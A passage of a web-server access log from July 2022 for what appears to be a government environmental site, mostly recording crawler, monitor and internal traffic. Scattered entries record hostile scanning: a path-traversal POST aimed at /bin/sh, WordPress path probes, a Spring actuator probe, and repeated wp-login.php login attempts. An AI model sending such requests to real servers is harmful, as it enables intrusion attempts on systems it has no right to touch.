40.77.167.66 - - [10/Jul/2022:04:47:44 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7443
168.138.24.51 - - [10/Jul/2022:04:47:32 -0500] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1022
157.55.39.168 - - [10/Jul/2022:04:47:56 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
216.245.221.92 - - [10/Jul/2022:04:47:57 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.8 - - [10/Jul/2022:04:48:00 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
157.55.39.114 - - [10/Jul/2022:04:48:02 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
168.138.24.51 - - [10/Jul/2022:04:47:48 -0500] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1022
157.55.39.114 - - [10/Jul/2022:04:48:04 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
201.245.192.253 - - [10/Jul/2022:04:48:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
168.138.24.51 - - [10/Jul/2022:04:48:04 -0500] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1022
168.138.24.51 - - [10/Jul/2022:04:48:20 -0500] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1022
168.138.24.51 - - [10/Jul/2022:04:48:36 -0500] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1022
168.138.24.51 - - [10/Jul/2022:04:48:52 -0500] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1022
172.22.2.4 - - [10/Jul/2022:04:47:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
168.138.24.51 - - [10/Jul/2022:04:49:09 -0500] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1022
168.138.24.51 - - [10/Jul/2022:04:49:25 -0500] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1022
168.138.24.51 - - [10/Jul/2022:04:49:41 -0500] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1022
172.22.2.4 - - [10/Jul/2022:04:48:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58491
154.21.208.188 - - [10/Jul/2022:04:51:24 -0500] "GET /wp-login.php HTTP/1.1" 404 1035
172.22.2.4 - - [10/Jul/2022:04:51:24 -0500] "GET /BLA/boletinlegal/wp-login.php HTTP/1.1" 404 1038
40.77.167.66 - - [10/Jul/2022:04:52:44 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
207.46.13.39 - - [10/Jul/2022:04:52:53 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
216.245.221.92 - - [10/Jul/2022:04:52:57 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.114 - - [10/Jul/2022:04:53:03 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
157.55.39.114 - - [10/Jul/2022:04:53:05 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
201.245.192.253 - - [10/Jul/2022:04:53:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:04:53:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:04:54:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58491
216.245.221.92 - - [10/Jul/2022:04:57:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:04:58:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:04:59:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:05:00:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58122
216.245.221.92 - - [10/Jul/2022:05:02:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:03:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:05:05:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:05:05:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60410
216.245.221.92 - - [10/Jul/2022:05:07:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:08:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
207.46.13.39 - - [10/Jul/2022:05:09:24 -0500] "GET /BLA/resoluciones/AUTOS%202022/2238.pdf HTTP/1.1" 200 396176
172.22.2.4 - - [10/Jul/2022:05:10:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jul/2022:05:12:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:13:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:05:11:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
185.7.214.104 - - [10/Jul/2022:05:15:29 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [10/Jul/2022:05:17:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:18:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
64.124.8.21 - - [10/Jul/2022:05:18:17 -0500] "-" 408 -
172.22.2.4 - - [10/Jul/2022:05:16:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.21 - - [10/Jul/2022:05:18:56 -0500] "-" 408 -
185.196.220.70 - - [10/Jul/2022:05:19:14 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [10/Jul/2022:05:17:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
64.124.8.21 - - [10/Jul/2022:05:19:38 -0500] "-" 408 -
103.167.194.138 - - [10/Jul/2022:05:20:29 -0500] "GET /pot-2013/cartografia/anexo01_sistema_hidrico.pdf HTTP/1.1" 200 5860035
64.124.8.21 - - [10/Jul/2022:05:20:33 -0500] "-" 408 -
64.124.8.21 - - [10/Jul/2022:05:20:38 -0500] "-" 408 -
64.124.8.21 - - [10/Jul/2022:05:20:40 -0500] "-" 408 -
201.245.192.253 - - [10/Jul/2022:05:21:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46011
201.245.192.253 - - [10/Jul/2022:05:21:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47246
216.245.221.92 - - [10/Jul/2022:05:22:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:23:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
207.46.13.39 - - [10/Jul/2022:05:23:36 -0500] "GET /BLA/resoluciones/AUTOS%202020/3738.pdf HTTP/1.1" 304 -
172.22.2.4 - - [10/Jul/2022:05:22:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:05:23:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60410
185.7.214.104 - - [10/Jul/2022:05:27:49 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
216.245.221.92 - - [10/Jul/2022:05:27:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:28:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:05:28:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:05:30:26 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8326
172.22.2.4 - - [10/Jul/2022:05:30:39 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [10/Jul/2022:05:30:47 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [10/Jul/2022:05:30:50 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [10/Jul/2022:05:29:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
201.245.192.253 - - [10/Jul/2022:05:31:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46011
201.245.192.253 - - [10/Jul/2022:05:31:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47246
216.245.221.92 - - [10/Jul/2022:05:32:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:33:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:05:34:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:05:35:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53187
216.245.221.92 - - [10/Jul/2022:05:37:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:37:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
40.77.167.39 - - [10/Jul/2022:05:38:31 -0500] "GET /portaldeninos/humedal-el-burro-2/ HTTP/1.1" 200 88127
207.46.13.45 - - [10/Jul/2022:05:38:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
40.77.167.24 - - [10/Jul/2022:05:38:48 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
157.55.39.133 - - [10/Jul/2022:05:38:48 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
40.77.167.39 - - [10/Jul/2022:05:38:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
207.46.13.45 - - [10/Jul/2022:05:38:49 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
40.77.167.24 - - [10/Jul/2022:05:38:51 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
157.55.39.133 - - [10/Jul/2022:05:38:51 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
207.46.13.45 - - [10/Jul/2022:05:38:52 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
40.77.167.39 - - [10/Jul/2022:05:38:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
40.77.167.24 - - [10/Jul/2022:05:38:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
157.55.39.133 - - [10/Jul/2022:05:38:54 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
40.77.167.39 - - [10/Jul/2022:05:38:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
207.46.13.45 - - [10/Jul/2022:05:38:55 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
157.55.39.133 - - [10/Jul/2022:05:38:57 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
40.77.167.24 - - [10/Jul/2022:05:38:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
40.77.167.39 - - [10/Jul/2022:05:38:58 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
207.46.13.184 - - [10/Jul/2022:05:38:58 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
40.77.167.24 - - [10/Jul/2022:05:39:00 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
207.46.13.184 - - [10/Jul/2022:05:39:01 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
40.77.167.24 - - [10/Jul/2022:05:39:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
207.46.13.184 - - [10/Jul/2022:05:39:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
157.55.39.51 - - [10/Jul/2022:05:39:06 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
207.46.13.184 - - [10/Jul/2022:05:39:07 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
157.55.39.51 - - [10/Jul/2022:05:39:09 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
207.46.13.184 - - [10/Jul/2022:05:39:11 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
157.55.39.51 - - [10/Jul/2022:05:39:12 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
207.46.13.184 - - [10/Jul/2022:05:39:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
201.245.192.253 - - [10/Jul/2022:05:41:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46011
201.245.192.253 - - [10/Jul/2022:05:41:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47246
46.249.32.102 - - [10/Jul/2022:05:41:32 -0500] "GET / HTTP/1.1" 400 946
172.22.2.4 - - [10/Jul/2022:05:40:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:05:40:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58491
216.245.221.92 - - [10/Jul/2022:05:42:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:42:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:05:45:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jul/2022:05:47:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:47:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:05:46:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54767
185.119.81.101 - - [10/Jul/2022:05:51:23 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jul/2022:05:51:24 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [10/Jul/2022:05:52:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:05:52:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:05:53:20 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1140
172.22.2.4 - - [10/Jul/2022:05:51:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:05:52:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
40.77.190.150 - - [10/Jul/2022:05:54:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
40.77.167.66 - - [10/Jul/2022:05:56:20 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
40.77.167.66 - - [10/Jul/2022:05:56:30 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
40.77.167.66 - - [10/Jul/2022:05:56:33 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
207.46.13.8 - - [10/Jul/2022:05:56:36 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
207.46.13.39 - - [10/Jul/2022:05:56:39 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
207.46.13.214 - - [10/Jul/2022:05:56:40 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
207.46.13.31 - - [10/Jul/2022:05:56:42 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
207.46.13.214 - - [10/Jul/2022:05:56:43 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
207.46.13.31 - - [10/Jul/2022:05:56:45 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
207.46.13.31 - - [10/Jul/2022:05:56:48 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
185.119.81.102 - - [10/Jul/2022:05:57:54 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [10/Jul/2022:05:57:54 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [10/Jul/2022:05:57:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:05:57:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:05:57:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:05:58:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
191.103.255.5 - - [10/Jul/2022:06:02:11 -0500] "-" 408 -
172.22.2.4 - - [10/Jul/2022:06:02:16 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2002%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 304 -
201.245.192.253 - - [10/Jul/2022:06:02:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:02:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:03:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:04:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57699
66.249.73.5 - - [10/Jul/2022:06:07:11 -0500] "-" 408 -
201.245.192.253 - - [10/Jul/2022:06:07:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:07:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:09:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:10:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58122
69.63.189.3 - - [10/Jul/2022:06:12:33 -0500] "GET /images/rueda-prensa-lluvias-secretaria-principal-23-marzo.jpg HTTP/1.1" 200 42664
69.63.189.3 - - [10/Jul/2022:06:12:33 -0500] "GET /fenomeno-de-la-nina-protagonista-en-la-primera-temporada-de-lluvias-del-2022.html HTTP/1.1" 206 1101
201.245.192.253 - - [10/Jul/2022:06:12:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:12:57 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.184 - - [10/Jul/2022:06:13:35 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Incendios-forestales-ajustada.gif HTTP/1.1" 200 764832
40.77.167.66 - - [10/Jul/2022:06:15:03 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20450%20del%2028%20de%20Agosto%20de%202017.pdf HTTP/1.1" 304 -
172.22.2.4 - - [10/Jul/2022:06:15:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:15:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58491
201.245.192.253 - - [10/Jul/2022:06:17:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:17:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:06:21:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46033
201.245.192.253 - - [10/Jul/2022:06:21:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47279
172.22.2.4 - - [10/Jul/2022:06:20:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:06:22:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:22:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:21:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58122
201.245.192.253 - - [10/Jul/2022:06:27:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:27:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:26:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:27:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
201.245.192.253 - - [10/Jul/2022:06:31:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46033
201.245.192.253 - - [10/Jul/2022:06:31:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47279
185.7.214.104 - - [10/Jul/2022:06:32:03 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jul/2022:06:32:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:32:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:32:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:33:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60410
201.245.192.253 - - [10/Jul/2022:06:37:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
185.119.81.101 - - [10/Jul/2022:06:37:51 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jul/2022:06:37:52 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [10/Jul/2022:06:37:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:38:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
128.14.209.162 - - [10/Jul/2022:06:40:54 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
172.22.2.4 - - [10/Jul/2022:06:39:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
201.245.192.253 - - [10/Jul/2022:06:41:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46033
201.245.192.253 - - [10/Jul/2022:06:41:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47279
172.22.2.4 - - [10/Jul/2022:06:42:04 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 304 -
66.249.65.13 - - [10/Jul/2022:06:42:07 -0500] "-" 408 -
201.245.192.253 - - [10/Jul/2022:06:42:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:42:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:44:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:45:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60410
201.245.192.253 - - [10/Jul/2022:06:47:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:47:57 -0500] "HEAD / HTTP/1.1" 200 -
37.19.197.32 - - [10/Jul/2022:06:50:20 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
172.22.2.4 - - [10/Jul/2022:06:50:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:52:11 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 304 -
13.66.139.12 - - [10/Jul/2022:06:52:16 -0500] "GET /bla/resoluciones/resoluciones%202012/1014.pdf HTTP/1.1" 200 603336
157.245.70.127 - - [10/Jul/2022:06:52:21 -0500] "\x16\x03\x01" 400 226
157.245.70.127 - - [10/Jul/2022:06:52:22 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [10/Jul/2022:06:50:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58122
35.204.163.53 - - [10/Jul/2022:06:52:41 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jul/2022:06:52:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:52:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:06:53:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
185.7.214.104 - - [10/Jul/2022:06:54:54 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 1018
172.22.2.4 - - [10/Jul/2022:06:54:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63618
172.22.2.4 - - [10/Jul/2022:06:55:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:06:57:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:06:57:57 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [10/Jul/2022:06:58:04 -0500] "-" 408 -
172.22.2.4 - - [10/Jul/2022:06:56:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56911
173.252.127.8 - - [10/Jul/2022:06:59:18 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 206 1095
41.188.51.43 - - [10/Jul/2022:07:00:10 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jul/2022:07:02:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:02:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:01:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:02:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58491
207.46.13.214 - - [10/Jul/2022:07:04:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0455.pdf HTTP/1.1" 304 -
172.22.2.4 - - [10/Jul/2022:07:04:54 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
40.77.167.66 - - [10/Jul/2022:07:06:19 -0500] "GET /BLA/resoluciones/AUTOS%202018/0329.pdf HTTP/1.1" 304 -
201.245.192.253 - - [10/Jul/2022:07:07:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:07:57 -0500] "HEAD / HTTP/1.1" 200 -
2.57.122.98 - - [10/Jul/2022:07:09:08 -0500] "GET / HTTP/1.1" 200 319
207.46.13.8 - - [10/Jul/2022:07:09:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4336.pdf HTTP/1.1" 304 -
172.22.2.4 - - [10/Jul/2022:07:07:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:08:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52424
172.22.2.4 - - [10/Jul/2022:07:09:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
